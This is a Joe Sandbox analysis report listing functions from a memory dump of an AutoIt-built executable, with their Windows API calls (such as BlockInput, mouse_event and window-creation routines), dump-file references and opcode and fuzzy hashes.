                                                                                                                                                                                                                                                                              Function 0076F4FF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • BlockInput.USER32(00000001), ref: 0076F51A
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: BlockInput
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3456056419-0
                                                                                                                                                                                                                                                                              • Opcode ID: 5db5225defbe9f76c73af5e552352a63c0f5df3cdf417421edbd35e9e50a81f7
                                                                                                                                                                                                                                                                              • Instruction ID: 6f4d0ab87df627e9b07ae641ed511fcf9ba3088f6ef090ab8a1769c7a8c25b7a
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5db5225defbe9f76c73af5e552352a63c0f5df3cdf417421edbd35e9e50a81f7
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0E092312002085FC710DF69E400956B7D9AFA4760B008429FD4AC7252D674AC408B94
                                                                                                                                                                                                                                                                              Function 0075EC6C Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 0075EC95
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: mouse_event
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2434400541-0
                                                                                                                                                                                                                                                                              • Opcode ID: 54308259219b4983c45e534d97dec8f6924f7e83b47115ba235d0327036340c8
                                                                                                                                                                                                                                                                              • Instruction ID: a4903bb4165691f97c3c1db49076d3ceb523adef8ebc0cb9eeee6a4170250479
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 54308259219b4983c45e534d97dec8f6924f7e83b47115ba235d0327036340c8
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17D017B619820169F81C0A3C8B2FEB60A0AA302743F904349F902D5595E4C9DB489231
                                                                                                                                                                                                                                                                              Function 00710D45 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,0071075E), ref: 00710D4A
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                              • Opcode ID: bed7497ba96ecb2a68f78d24776398c7a79277df6ab93925ae4e58e20d462ad8
                                                                                                                                                                                                                                                                              • Instruction ID: a1d9e1271cb6770626b6ff529207ae721b7960933e6f1e3e730fefe67476f382
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bed7497ba96ecb2a68f78d24776398c7a79277df6ab93925ae4e58e20d462ad8
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                              Function 0077353B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 0077358D
                                                                                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 007735A0
                                                                                                                                                                                                                                                                              • DestroyWindow.USER32 ref: 007735AF
                                                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 007735CA
                                                                                                                                                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 007735D1
                                                                                                                                                                                                                                                                              • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00773700
                                                                                                                                                                                                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 0077370E
                                                                                                                                                                                                                                                                              • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00773755
                                                                                                                                                                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 00773761
                                                                                                                                                                                                                                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0077379D
                                                                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007737BF
                                                                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007737D2
                                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007737DD
                                                                                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 007737E6
                                                                                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007737F5
                                                                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 007737FE
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00773805
                                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00773810
                                                                                                                                                                                                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00773822
                                                                                                                                                                                                                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,00790C04,00000000), ref: 00773838
                                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00773848
                                                                                                                                                                                                                                                                              • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 0077386E
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 0077388D
                                                                                                                                                                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007738AF
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00773A9C
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                                                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                                                              • API String ID: 2211948467-2373415609
                                                                                                                                                                                                                                                                              • Opcode ID: ea650af1e68617372212a3bd3cbe25d00ef2aaf5c50bcd9c46c45a45f101608c
                                                                                                                                                                                                                                                                              • Instruction ID: d97d5eb28a1357421ce41ad35189b6998608ed96ccc115beb309f4168d83e845
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ea650af1e68617372212a3bd3cbe25d00ef2aaf5c50bcd9c46c45a45f101608c
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D026C71900209AFDB14DF64CD89EAE7BB9FF48350F14C158F919AB2A1DB78AD01CB64
                                                                                                                                                                                                                                                                              Function 006F1625 Relevance: 53.0, APIs: 26, Strings: 4, Instructions: 480windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • DestroyWindow.USER32(?,?), ref: 006F16B4
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 00732B07
                                                                                                                                                                                                                                                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00732B40
                                                                                                                                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00732F85
                                                                                                                                                                                                                                                                                • Part of subcall function 006F1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,006F1488,?,00000000,?,?,?,?,006F145A,00000000,?), ref: 006F1865
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001053), ref: 00732FC1
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00732FD8
                                                                                                                                                                                                                                                                              • ImageList_Destroy.COMCTL32(00000000,?), ref: 00732FEE
                                                                                                                                                                                                                                                                              • ImageList_Destroy.COMCTL32(00000000,?), ref: 00732FF9
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                                                                                                                              • String ID: 0$(|$(|$(|
                                                                                                                                                                                                                                                                              • API String ID: 2760611726-3878567830
                                                                                                                                                                                                                                                                              • Opcode ID: d7dd003190fb30186720b9f5c87ca57222e82ed972afab3cf92875304145269a
                                                                                                                                                                                                                                                                              • Instruction ID: 5173fbed66a1f817f375b630178f8c86dc4b66ba5bf297655bbda29dc02f2483
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d7dd003190fb30186720b9f5c87ca57222e82ed972afab3cf92875304145269a
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33128830204205EFEB25DF14C888BA9B7E2BB45310F28856DF595DB263C739AC83DB95
                                                                                                                                                                                                                                                                              Function 0077316E Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • DestroyWindow.USER32(00000000), ref: 0077319B
                                                                                                                                                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 007732C7
                                                                                                                                                                                                                                                                              • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00773306
                                                                                                                                                                                                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00773316
                                                                                                                                                                                                                                                                              • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 0077335D
                                                                                                                                                                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 00773369
                                                                                                                                                                                                                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 007733B2
                                                                                                                                                                                                                                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 007733C1
                                                                                                                                                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 007733D1
                                                                                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 007733D5
                                                                                                                                                                                                                                                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 007733E5
                                                                                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007733EE
                                                                                                                                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 007733F7
                                                                                                                                                                                                                                                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00773423
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 0077343A
                                                                                                                                                                                                                                                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 0077347A
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0077348E
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 0077349F
                                                                                                                                                                                                                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 007734D4
                                                                                                                                                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 007734DF
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 007734EA
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 007734F4
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                                                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                                                                              • API String ID: 2910397461-517079104
                                                                                                                                                                                                                                                                              • Opcode ID: d9f7cf2b933b2e3bc0dab83c0c24295cfd622b5d82fd3cc692f4ad0d42882021
                                                                                                                                                                                                                                                                              • Instruction ID: 0306084a324e9807edd526e89da05decf9f9536400703e63db543a4fdcc4c371
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d9f7cf2b933b2e3bc0dab83c0c24295cfd622b5d82fd3cc692f4ad0d42882021
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56B14E71A40209AFEB14DFA8CD49FAE7BA9FB49750F108118FA15E72D1D7B8AD00CB54
                                                                                                                                                                                                                                                                              Function 00765524 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 00765532
                                                                                                                                                                                                                                                                              • GetDriveTypeW.KERNEL32(?,0078DC30,?,\\.\,0078DCD0), ref: 0076560F
                                                                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000,0078DC30,?,\\.\,0078DCD0), ref: 0076577B
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                                                                                                              • API String ID: 2907320926-4222207086
                                                                                                                                                                                                                                                                              • Opcode ID: b45c96c4c1931417b6c19078d8dedb3133d69f65379510b477d395c6d2706eaf
                                                                                                                                                                                                                                                                              • Instruction ID: 449705f0b72d722cfc6e0e7c1a39134e10efa5eb4da273a64c03b538056dad96
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b45c96c4c1931417b6c19078d8dedb3133d69f65379510b477d395c6d2706eaf
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A61F570B48909DFC728DF24C995AB877A1EF54750F248069EC07AB291C77DDE01EB51
                                                                                                                                                                                                                                                                              Function 006F2521 Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 282windowtimeCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006F25F8
                                                                                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000007), ref: 006F2600
                                                                                                                                                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006F262B
                                                                                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000008), ref: 006F2633
                                                                                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000004), ref: 006F2658
                                                                                                                                                                                                                                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 006F2675
                                                                                                                                                                                                                                                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 006F2685
                                                                                                                                                                                                                                                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 006F26B8
                                                                                                                                                                                                                                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 006F26CC
                                                                                                                                                                                                                                                                              • GetClientRect.USER32(00000000,000000FF), ref: 006F26EA
                                                                                                                                                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 006F2706
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 006F2711
                                                                                                                                                                                                                                                                                • Part of subcall function 006F19CD: GetCursorPos.USER32(?), ref: 006F19E1
                                                                                                                                                                                                                                                                                • Part of subcall function 006F19CD: ScreenToClient.USER32(00000000,?), ref: 006F19FE
                                                                                                                                                                                                                                                                                • Part of subcall function 006F19CD: GetAsyncKeyState.USER32(00000001), ref: 006F1A23
                                                                                                                                                                                                                                                                                • Part of subcall function 006F19CD: GetAsyncKeyState.USER32(00000002), ref: 006F1A3D
                                                                                                                                                                                                                                                                              • SetTimer.USER32(00000000,00000000,00000028,006F199C), ref: 006F2738
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                                                                              • String ID: <)|$<)|$AutoIt v3 GUI$(|$(|$(|
                                                                                                                                                                                                                                                                              • API String ID: 1458621304-1610310851
                                                                                                                                                                                                                                                                              • Opcode ID: 47360be0d3f52ced125e8131b3de3c3695a3254aff447064af97b8fb49adf10b
                                                                                                                                                                                                                                                                              • Instruction ID: ec3aa86e720180149e68bfb4bf3a5a1e31e82243f910f203332b70c92b2538a1
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47360be0d3f52ced125e8131b3de3c3695a3254aff447064af97b8fb49adf10b
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4BB17C3164020ADFDB24DFA8CC59BAD7BB5FB48314F108219FA15AB2D1DB78A841CF55
                                                                                                                                                                                                                                                                              Function 00780CDD Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00780D81
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00780DBB
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00780E25
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00780E8D
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00780F11
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00780F61
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00780FA0
                                                                                                                                                                                                                                                                                • Part of subcall function 0070FD52: _wcslen.LIBCMT ref: 0070FD5D
                                                                                                                                                                                                                                                                                • Part of subcall function 00752B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00752BA5
                                                                                                                                                                                                                                                                                • Part of subcall function 00752B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00752BD7
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                                                                                                              • API String ID: 1103490817-719923060
